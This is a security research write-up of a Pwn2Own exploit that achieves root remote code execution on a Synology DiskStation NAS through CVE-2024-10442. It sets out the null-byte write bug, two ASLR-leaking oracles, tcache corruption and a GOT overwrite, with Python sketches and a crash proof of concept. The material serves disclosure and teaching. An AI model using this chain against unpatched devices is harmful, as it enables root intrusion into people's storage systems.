Exploiting the Synology DiskStation with Null-byte Writes
Achieving remote code execution as root on the Synology DS1823xs+ NAS
In October, we attended Pwn2Own Ireland 2024 and successfully exploited the Synology DiskStation DS1823xs+ to obtain remote code execution as root. This issue has been fixed as CVE-2024-10442.
The DiskStation is a popular line of NAS (network-attached storage) products by Synology. It has been successfully exploited a few times at Pwn2Own events in the past, though it remained untouched in the prior year’s event (Pwn2Own Toronto 2023). Then Ireland 2024 saw three successful entries, all using unique bugs.
This post will detail our experience researching the Synology DiskStation and writing an exploit against it for the event.
Reviewing Synology Packages
As mentioned, the past year or two of Pwn2Own had garnered no entries against the Synology DiskStation. In 2024, ZDI opted to place a few non-default, but first-party packages authored by Synology in-scope for the competition:
For the Synology DiskStation target, the following packages will be installed and are in scope for contest:
- MailPlus
- Drive
- Virtual Machine Manager
- Snapshot Replication
- Surveillance Station
- Photos
“Packages” are optional add-on applications / services (etc.) that can be easily installed on the device via Synology’s Package Center in the DiskStation Manager.
For us, this meant more attack surface, and as this was the first year these packages were in-scope, we figured there was good opportunity to find some relatively shallow vulnerabilities, as these packages likely hadn’t seen as much security-oriented review. This turned out to be very true.
The first package we looked at was Virtual Machine Manager, which we installed directly from the built-in Package Center on a physical DiskStation.
We could then enumerate any new network listeners with netstat via an SSH shell we had on our test device. This revealed a handful of localhost-only services, save for a single service bound to all interfaces, running the following command (as root):
/var/packages/ReplicationService/target/sbin/synobtrfsreplicad --port 5566
This listener was actually part of Replication Service, a separate package which was a dependency of Virtual Machine Manager (and is also a dependency of Snapshot Replication). Our interest was piqued given the high privilege-level and ease of communication with this service.
The next step was to examine the binary. Since we had installed the service on a real device, we were able to pull the files via SSH.
Alternatively, software downloads are available directly from Synology for both DSM (the core operating system) and packages. An extraction tool can then be used to parse the custom Synology archives and spit out the contents of packages, firmware images, or updates. Note that this particular tool is an FFI wrapper around native first-party Synology shared libraries, which can be pulled off a real device, or extracted from a DSM archive with a separate tool.
Finding the Bug
With the relevant binaries in hand, we can start to look at the code for this TCP service listening on port 5566.
The main binary synobtrfsreplicad is just a driver shim to invoke functionality in libsynobtrfsreplicacore.so.7, which starts the TCP listener.
The service is a minimal Linux-based forking server, with the main process continually calling accept() and forking off a child process to handle each new remote client. In turn, the child process runs a basic command loop to parse incoming messages sent to the service.
Each command has a simple binary format, with an opcode optionally followed by a variably-sized data payload:
Two globals are defined to facilitate parsing these command messages. One is for the command itself, and the other is a ring-buffer-esque structure to hold up to 3 variably-sized command payloads.
The command loop for reading messages looks something like this:
If the attacker-supplied length is too large, recvCmd bails out without reading any payload. However, its return value is zero, indicating no error, which is a bit odd considering the header length was invalid. Back in the caller, which is unaware of any error, things proceed normally, and the command payload is null-terminated using the arbitrarily large header length.
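To make the flaw concrete, here is a toy Python model of the behavior described above. It is a sketch under assumptions, not the service's actual code: the class and method names are invented, the exact bound checked by recvCmd is assumed to be the buffer size, and the BSS is modelled as one flat byte array.

```python
BUF_SIZE = 0x10000   # size of each payload buffer, per the post
NUM_BUFS = 3         # the global holds up to three payloads


class ToyService:
    """Toy model of the parsing flaw; names and bounds are assumptions."""

    def __init__(self):
        # Flat "BSS": payload buffers followed by other globals.
        # 0xff filler makes stray null writes easy to spot.
        self.bss = bytearray(b"\xff" * (NUM_BUFS * BUF_SIZE + 0x1000))

    def recv_cmd(self, length, payload):
        if length > BUF_SIZE:        # assumed bound; the real check may differ
            return 0                 # bug: bails out but still reports success
        # Normal path: copy the payload into the first buffer.
        self.bss[0:length] = payload[:length].ljust(length, b"\x00")
        return 0

    def handle(self, length, payload=b""):
        if self.recv_cmd(length, payload) != 0:
            return False             # never taken for oversized lengths
        self.bss[length] = 0         # null-terminate using the unchecked length
        return True


svc = ToyService()
target = NUM_BUFS * BUF_SIZE + 0x10  # an offset past all payload buffers
svc.handle(target)                   # oversized "length" from the header
```

After the call, `svc.bss[target]` is zero while its neighbors keep the filler value, which is the single out-of-bounds null write the rest of the post builds on.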
This bug is trivial enough that for our initial POC, we can use netcat to send a message consisting solely of A’s (at least 12), in classic pwnable fashion:
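The same test can also be scripted. The following is a minimal Python sketch of such a proof of concept; the function names are ours, and the host argument is a placeholder for a test device you control.

```python
import socket

PORT = 5566  # listener port mentioned earlier in the post


def build_poc(n=12):
    """Return n bytes of 'A'; the post notes at least 12 are needed."""
    if n < 12:
        raise ValueError("need at least 12 bytes")
    return b"A" * n


def send_poc(host, port=PORT, timeout=5.0):
    """Connect to the service and send the all-'A' message."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_poc())

# Usage (against your own test device only):
#   send_poc("192.0.2.10")   # placeholder address
```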
Unless you’re attached to the service using gdb, there’s no on-device indication that anything has gone wrong. The fault doesn’t seem to be logged to syslog or any other DSM logging facilities, and due to the nature of a forking server, there is no immediate loss of functionality.
The primitive afforded by this vulnerability allows us to make repeated null byte writes into arbitrary offsets of the shared library’s BSS (its zero-initialized data section). Very CTF-like. Although the vulnerability is rather simple, the exploitation of it will be a bit more interesting.
Regardless, as all mitigations were enabled, we first had to somehow turn this into an info leak.
Forking Server
Before we move on, recall that we’re dealing with a forking server, which can be very useful for breaking ASLR. Each child process that is forked will have the same exact address space as the parent, and crashing them has no consequences: we simply reconnect to the service and get a clean slate, in the form of a new child process. A bit like a time loop, each connection is an opportunity to glean new information about the address space in a cumulative manner.
At a high level, each iteration has the following structure:
- Guess something (e.g. an address)
- Have the binary use the guessed value such that it will behave differently if it’s correct or not (e.g. a wrong address will crash)
- Observe the binary’s behavior to determine if the value was correct
- If correct, we have found the right value. Otherwise, repeat with the next guess
We’ll see how this can be applied to this specific binary as we continue.
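The iteration structure above can be sketched generically in Python. Here `probe` is a hypothetical stand-in for "open a new connection, send the guess, and observe whether the child survives"; the simulated target at the bottom exists only to make the sketch runnable.

```python
def brute_force(candidates, probe):
    """Return the first candidate for which probe(candidate) is True."""
    for guess in candidates:
        if probe(guess):        # one fresh connection (child process) per guess
            return guess
    return None


# Simulated target: every forked child shares the parent's secret layout,
# so a value learned in one child stays valid for the next.
SECRET_NIBBLE = 0x7


def child_survives(guess):
    return guess == SECRET_NIBBLE   # a wrong guess "crashes" the child


found = brute_force(range(16), child_survives)
```

Because the address space is identical across children, the cost is linear in the number of candidates rather than exponential in the number of unknown bits, provided each unknown can be tested separately.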
Functionality Overview
Since the bug in question occurs during input parsing, we hadn’t yet explored much of the program’s functionality, which we’ll need to leverage in constructing an exploit later on.
After reading the command from the network, the command loop has a switch-case over the supplied opcode. Opcodes that require input parse them from the variable-length command payload. We looked through all the available opcodes to get a rough idea of their functions:
- CMD_DSM_VER: no inputs
  - returns DSM version numbers
- CMD_SSL: initializes SSL for the connection
- CMD_TEST_CONNECT
- CMD_NOP
- CMD_VERSION: input integer
  - sets the “version” of the connection for compatibility differences
- CMD_TOKEN: input string “token” which must exist as a key in a JSON file on disk
  - performs initialization and sets the global std::string g_token
- CMD_NAME: input string “name”
  - can potentially perform btrfs-related operations, and/or use g_token to modify the JSON file
- CMD_SEND: input raw data
  - proxies input to a file descriptor, seemingly set up elsewhere as a pipe to a btrfs command
- CMD_UPDATE
- CMD_STOP: input token string
  - removes token from JSON
- CMD_COUNT
- CMD_CLR_BKP
- CMD_SYNCSIZE
- CMD_END
It soon became clear that many of these code paths hinged on providing a valid “token,” which was supposed to already exist in a JSON file at /usr/syno/etc/synobtrfsreplica/btrfs_snap_replica_recv_token.
The JSON is used as a simple key-value store of attributes, where the tokens are the keys:
{
"<token>": {"<attribute>":value, ... other attributes ...},
... other tokens ...
}
Presumably, some external service hands out these tokens and writes to the file, but where this happened was unclear to us.
However, there is one code path that allows adding tokens to the JSON file, possibly in an unintended way. The CMD_NAME opcode uses the current g_token, and writes an attribute to the file, with two important nuances:
- it does not check if g_token was ever initialized (i.e. with CMD_TOKEN)
- if the token did not already exist as a key in the JSON object, setting the attribute adds it
Normally, the uninitialized g_token will just be an empty string, but with memory corruption in play, all bets are off, and we’ll see how this proves useful later on.
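The "set an attribute, implicitly create the key" behavior can be illustrated with a small Python sketch. The helper names and the attribute name are hypothetical; only the key-value shape of the JSON comes from the description above.

```python
import json


def set_attribute(store_text, token, attr, value):
    """Set store[token][attr], creating the token entry if it is missing."""
    store = json.loads(store_text)
    store.setdefault(token, {})[attr] = value
    return json.dumps(store)


def token_exists(store_text, token):
    """Lookup comparable to what a token check would perform."""
    return token in json.loads(store_text)


text = json.dumps({"legit-token": {"some_attr": 1}})
# An uninitialized g_token is the empty string, so it becomes a new key.
text = set_attribute(text, "", "name", "x")
```

After the call, the empty token is a valid key, even though nothing ever handed it out. Whatever bytes g_token happens to hold end up persisted in the file in the same way.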
ASLR Oracle #1: Freeing a Fake Heap Chunk
Our primitive is a null byte write, where we supply an arbitrary offset into a command payload buffer. The offset is unsigned, so we can only write nulls to memory following the payload buffer.
This raises the question of what resides after the payload buffer, which will be one of the three 0x10000-sized buffers in the g_recvbuf global in the shared library’s BSS.
There aren’t many globals except for a handful of std::string instances, which have the following structure:
The default constructor sets the length to 0, and points the char* at the inline buffer. In other words, we’ll have a bunch of std::string instances in the BSS with pointers set to their own BSS address, plus the offset 16.
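For reference, the layout can be modelled with ctypes. This sketch assumes the usual libstdc++ small-string layout on a 64-bit target (pointer, length, then a 16-byte inline buffer sharing space with the capacity); the field names and the example address are ours.

```python
import ctypes


class LocalOrCapacity(ctypes.Union):
    # The inline buffer and the heap capacity share the same 16 bytes.
    _fields_ = [("local_buf", ctypes.c_char * 16),
                ("capacity", ctypes.c_uint64)]


class StdString(ctypes.Structure):
    _fields_ = [("ptr", ctypes.c_uint64),      # char* to the string data
                ("length", ctypes.c_uint64),   # current length
                ("u", LocalOrCapacity)]        # inline buffer / capacity


def default_constructed(address):
    """Model a default-constructed string living at `address`."""
    s = StdString()
    s.ptr = address + StdString.u.offset   # points at its own inline buffer
    s.length = 0
    return s


s = default_constructed(0x7F0000013240)    # hypothetical BSS address
```

Under these assumptions the object is 32 bytes and the inline buffer sits at offset 16, which matches the "own address plus 16" observation above.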
Now, consider if we use our null write to zero out the two lowest bytes of one of these pointers. The payload buffer that precedes it is 0x10000 bytes, which is large enough to guarantee that the partially-nulled BSS pointer points somewhere within this buffer, although we don’t know the exact offset.
Since ASLR has page granularity (12 bits), there will be 4 bits (one nibble) of entropy in this offset (i.e. it can be 0, 0x1000, 0x2000, … 0xf000).
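A short worked example shows where the 16 candidates come from. The library offsets below are hypothetical (chosen so that a string object sits shortly after a 0x10000-byte buffer); only the masking arithmetic reflects the technique.

```python
BUF_OFF = 0x3200                      # hypothetical offset of the payload buffer
STR_OFF = BUF_OFF + 0x10000 + 0x40    # hypothetical offset of the std::string


def nulled_offset(base):
    """Offset into the payload buffer that the corrupted char* points at."""
    ptr = base + STR_OFF + 16         # default-constructed: own address + 16
    nulled = ptr & ~0xFFFF            # two low bytes zeroed by the bug
    return nulled - (base + BUF_OFF)


# Try many page-aligned load addresses and collect the distinct results.
offsets = sorted({nulled_offset(0x7F0000000000 + k * 0x1000)
                  for k in range(256)})
```

With these made-up offsets, `offsets` contains exactly 16 values spaced 0x1000 apart, all inside the buffer. The fixed remainder below 0x1000 depends only on the static layout, so the attacker knows it in advance and only the nibble has to be guessed.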
One of the global strings we can corrupt is _gSnapRecvPath, which can be re-assigned as one of the operations performed by the CMD_NAME command.
When re-assigning a std::string, if the char* is not pointing at the inline buffer, delete will be called on the old (now corrupted) value before assigning the new one.
This lets us call free on a fake chunk within the payload buffer. We naturally control the contents of this buffer with our command payloads.
When free is invoked, if the fake chunk has a small-enough size, it will be placed into the glibc tcache. Alternatively, if the size is invalid (e.g. zero), free will call abort, crashing the process. This creates our first oracle, which we can combine with the forking-server behavior to determine which of the 16 possible offsets (0, 0x1000, … 0xf000) the fake chunk resides at.
For each of the 16 possible offsets:
- Populate the payload buffer with padding up to the guessed offset, followed by the fake chunk’s metadata (which is just a fake size value)
- Trigger the bug twice to null out the two low bytes of the char* for _gSnapRecvPath
- Use CMD_NAME to free the corrupted char*, which may or may not be pointing at the fake chunk placed at the guessed offset
  - if the socket remains connected and a response is sent, the guessed offset was correct
  - if the socket is closed (i.e. abort was called), the guess was incorrect; try again with the next offset
We have now resolved one nibble of ASLR entropy and can reliably free a fake chunk in the payload buffer, which will be placed into the tcache.
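The steps above can be simulated offline. In this sketch the chunk size, the constant part of the offset, and the helper names are all hypothetical, and `free_survives` is only a rough stand-in for glibc's size sanity checks (on 64-bit, the size field sits 8 bytes below the freed pointer).

```python
import struct

BUF_SIZE = 0x10000
CHUNK_SIZE = 0x40          # hypothetical tcache-sized fake chunk


def build_payload(guess):
    """Zero padding, plus a fake size field just below the guessed pointer."""
    buf = bytearray(BUF_SIZE)                  # wrong guesses will see size 0
    struct.pack_into("<Q", buf, guess - 8, CHUNK_SIZE | 1)  # PREV_INUSE bit
    return bytes(buf)


def free_survives(buf, true_off):
    """Simplified model: free() aborts unless the size looks plausible."""
    (size,) = struct.unpack_from("<Q", buf, true_off - 8)
    size &= ~0x7                               # strip the flag bits
    return 0x20 <= size <= 0x410 and size % 16 == 0


def find_offset(candidates, true_off):
    for guess in candidates:                   # one connection per guess
        if free_survives(build_payload(guess), true_off):
            return guess
    return None


candidates = [0xE00 + n * 0x1000 for n in range(16)]   # 0xE00 is made up
found = find_offset(candidates, 0x5E00)
```

In the real exploit the "survives" signal is the socket staying open and a response arriving, as described in the list.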
ASLR Oracle #2: Leaking Tokens
The tcache is a singly-linked list of free chunks, and each free chunk has a next pointer. Due to some hardening attempts in glibc, the next pointer is populated like so:
In our case, the tcache list will have been empty beforehand (next = 0), so the value written will be &chunk->next >> 12. In other words, we’ve placed a shifted BSS pointer into the payload buffer. We’ll now want to figure out some way to leak this value.
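The pointer mangling in question is glibc's "safe-linking", which XORs the stored pointer with the address of the field holding it, shifted right by 12. A small Python rendering of that arithmetic, with a hypothetical address for the fake chunk:

```python
def protect_ptr(pos, ptr):
    """Value stored in chunk->next; pos is the address of the next field."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos, stored):
    """Inverse operation, applied when the pointer is read back."""
    return (pos >> 12) ^ stored


pos = 0x766554433E00            # hypothetical address of the fake chunk's next
stored = protect_ptr(pos, 0)    # empty list: next == 0
```

With an empty list the XOR is a no-op, so `stored` is simply `pos >> 12`, i.e. the address with its low 12 bits dropped.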
Once the fake chunk has been freed and the shifted BSS pointer written, we’ll null out the low 2 bytes of the char* of a second global std::string, g_token. This corruption will make g_token point at the same exact spot as _gSnapRecvPath. That is, at the shifted BSS pointer.
Recall our earlier functionality discussion of CMD_NAME, which can add an uninitialized g_token to the JSON file on disk. This is where that fact proves useful, since instead of the “uninitialized” g_token holding an empty string, it now points at the shifted BSS pointer. Triggering this code path, the JSON file now contains the value we want to leak.
Also note that before writing g_token out to disk, we can trigger the null byte write an additional time to truncate the shifted BSS pointer. In this way, we can write out each segment of the pointer. For example, if the shifted pointer is 0x766554433, we can write out each segment from 33, 3344, … to the full 3344556607.
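The segments in that example are just the little-endian prefixes of the pointer, which a few lines of Python can reproduce (the function name is ours):

```python
def truncated_segments(shifted_ptr, width=5):
    """Little-endian prefixes of the pointer, from 1 byte up to `width`."""
    raw = shifted_ptr.to_bytes(width, "little")
    return [raw[:n] for n in range(1, width + 1)]


segments = [s.hex() for s in truncated_segments(0x766554433)]
# segments == ['33', '3344', '334455', '33445566', '3344556607']
```

Each prefix is what g_token reads as once a null byte is written directly after it.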
Once the JSON file contains the leak, we can use CMD_TOKEN as intended, which expects a single string parameter indicating the token to use. This token will be looked up in the JSON file, and different error codes will be returned based on whether it was found or not. This creates our second oracle, which we can use to implement a byte-by-byte brute force:
- Loop b from 0 to 4 for each of the 5 bytes of the shifted BSS pointer:
  - Truncate the pointer to length b+1, then write the truncated segment into the JSON file
  - Loop over possible bytes 0 - 0xff:
    - send CMD_TOKEN with the guessed byte (prepended with the bytes already known from previous iterations, of length b)
    - the returned error code will indicate if the supplied byte was correct
    - if correct, we’ve found the byte at index b of the shifted pointer
    - otherwise, keep trying with the next possible byte
Once this byte-by-byte brute force is complete, we’ll have leaked the shifted BSS pointer, which gives us the base address of the shared library.
Since mmap mappings are typically laid out contiguously in virtual memory, this also gives us the addresses of the other shared libraries, most notably libc.
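The byte-by-byte brute force can be sketched against a simulated target. `ToyTarget` is an invented stand-in for the service: `write_segment` models "truncate and persist g_token", and `token_found` models the error code returned by CMD_TOKEN. The sketch ignores byte values that could not appear in a token string (such as a null byte), which a real exploit would need to handle.

```python
class ToyTarget:
    """Simulated service holding a secret 5-byte shifted pointer."""

    def __init__(self, shifted_ptr):
        self._raw = shifted_ptr.to_bytes(5, "little")
        self.tokens = set()

    def write_segment(self, n):
        self.tokens.add(self._raw[:n])     # truncated pointer lands in the JSON

    def token_found(self, token):
        return token in self.tokens        # the CMD_TOKEN oracle


def leak(target, width=5):
    known = b""
    for b in range(width):
        target.write_segment(b + 1)
        for guess in range(0x100):
            if target.token_found(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte matched")
    return int.from_bytes(known, "little")


shifted = leak(ToyTarget(0x766554433))
page = shifted << 12     # page address containing the fake chunk
```

This takes at most 5 × 256 probes. Subtracting the fake chunk's known offset within the library from its recovered address then yields the load address.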
Hijacking Control Flow
Armed with a leak, we are ready to craft a final payload to hijack control flow.
We already have the ability to free a fake chunk in the payload buffer, and by sending additional commands, we can arbitrarily corrupt this free chunk. At this point, we can abuse the tcache linked list in the standard way:
- Corrupt the fake chunk’s next pointer with an arbitrary address
- Allocate something of the same size as the fake chunk
  - malloc will return the fake chunk, then set the new head of the tcache list to the arbitrary address
- Allocate the same size again to have malloc return the arbitrary address
We just have to find some code that matches this pattern of two consecutive allocations.
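The two-allocation pattern is easy to see in a toy model of a single tcache bin. This is a deliberately simplified sketch: it keeps only the singly-linked list and the pointer mangling, and ignores the per-bin counters and alignment checks that real glibc performs. The addresses are hypothetical.

```python
class ToyTcache:
    """One tcache bin: a singly-linked free list with mangled next pointers."""

    def __init__(self):
        self.mem = {}     # chunk address -> stored (mangled) next pointer
        self.head = 0

    def free(self, chunk):
        self.mem[chunk] = (chunk >> 12) ^ self.head
        self.head = chunk

    def malloc(self):
        chunk = self.head
        # Unmangle the stored next pointer; it becomes the new list head.
        self.head = (chunk >> 12) ^ self.mem.get(chunk, 0)
        return chunk


fake = 0x766554433E00      # fake chunk inside the payload buffer
target = 0x766554420F00    # arbitrary address we want malloc to return

tc = ToyTcache()
tc.free(fake)                            # oracle #1 put the fake chunk here
tc.mem[fake] = (fake >> 12) ^ target     # overwrite next via a later payload
first = tc.malloc()                      # returns the fake chunk
second = tc.malloc()                     # returns the arbitrary address
```

Note that the overwritten next pointer has to be mangled with the chunk's own shifted address, which is why the leak from the previous section is a prerequisite.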
Luckily, it turns out that the CMD_TOKEN handler fits this pattern, and after the two allocations are performed, a std::string temporarily containing our input parameter is destructed, invoking delete on a char* with our input.
This brings us to the following strategy:
- Corrupt the fake tcache chunk’s next pointer to point near the shared library’s GOT entry for delete
- Send a CMD_TOKEN command
- The handler will allocate twice from the corrupted tcache, overwriting the GOT entry for delete with system
- The subsequent destructor calls delete, which instead invokes system with the controlled input string
From here it’s game over. We can simply execute /bin/sh and redirect stdio to the client socket that’s already connected (avoiding the need for a connect-back).
The full exploit code for our submission has been made available here.
The Fix
The vulnerability was assigned CVE-2024-10442. Synology released a patch for Replication Service relatively quickly, on November 5th, 2024 (Pwn2Own Ireland took place on October 22nd); the advisory can be found here. ZDI’s advisory can be found here.
The patch modified the recvCmd function to return an error instead of zero if the supplied header length is too large. The caller then detects this error and bails instead of continuing to process the invalid command.
Conclusion
Although easy to find, this vulnerability was interesting to exploit, in that the null byte write was relatively weak as a primitive. It felt like the sort of bug you’d find in a CTF challenge, and the tcache manipulation and brute force oracles matched the CTF vibe as well.
On a more serious note, even though it’s in a non-default package, the presence of such a simple vulnerability in a remotely accessible service (running as root) is a bit concerning, especially considering that Synology is a fairly popular consumer and business oriented NAS, and it’s not uncommon for these devices to be exposed to the internet.